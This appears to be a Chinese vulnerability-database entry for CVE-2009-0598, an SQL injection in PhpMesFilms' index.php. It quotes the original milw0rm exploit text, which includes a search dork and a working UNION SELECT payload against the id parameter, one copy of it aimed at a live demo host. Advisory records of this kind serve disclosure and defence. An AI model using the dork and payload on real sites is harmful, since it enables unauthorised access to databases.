PhpMesFilms 'index.php' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117190 漏洞类型 SQL注入
发布时间 2009-01-04 更新时间 2009-02-17
CVE编号 CVE-2009-0598 CNNVD-ID CNNVD-200902-360
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7660
https://cxsecurity.com/issue/WLB-2009020197
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200902-360
|漏洞详情
PhpMesFilms是一个视频库管理脚本。PhpMesFilms1.0版本和1.8版本的index.php中存在SQL注入漏洞。远程攻击者可以借助id参数,执行任意SQL指令。
|漏洞EXP
[~] in the name of God
[~]
[~] Download script : http://www.script-masters.com/home/download.php?script=138
[~]
[~]----------------------------------------------------------
[~] Discovered By: SuB-ZeRo(from algeria)   msn: FbH@hotmail.com
[~]
[~] D-unit : SuB-ZeRo & Me!sTer & HaLokA
[~]
[~] Home: www.dz-security.net/ my exploit : www.dz-security.net/subzero
[~]
[~] N0T: We ArE MoUsLiMme WiThE GaZa 4 ever
[~] -----------------------------------------------------------
dork : powered by PhpMesFilms
Exploit:
http://www.sit.com/script/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
---------------------------------------------------------------------------------------------
L!Ve DeMo:
http://phpmesfilms.dyndns.org/demo/index.php?id=3+union+select+1,concat(user(),0x3a,@@version),3,4,5,6,7,8,9,10--
 not : in this script some times version is 4 and some times is 5 have nice day
[~]----------------------------------------------------------------------
[~] Greetz tO: Me!sTer & HaLoKa & MaXi32 & Dz-TeAm and all algeria & gaza
[~] we are D-unit www.dz-security.net
[~]----------------------------------------------------------------------

# milw0rm.com [2009-01-04]
|参考资料

来源:BID
名称:33105
链接:http://www.securityfocus.com/bid/33105
来源:MILW0RM
名称:7660
链接:http://www.milw0rm.com/exploits/7660
来源:SECUNIA
名称:33332
链接:http://secunia.com/advisories/33332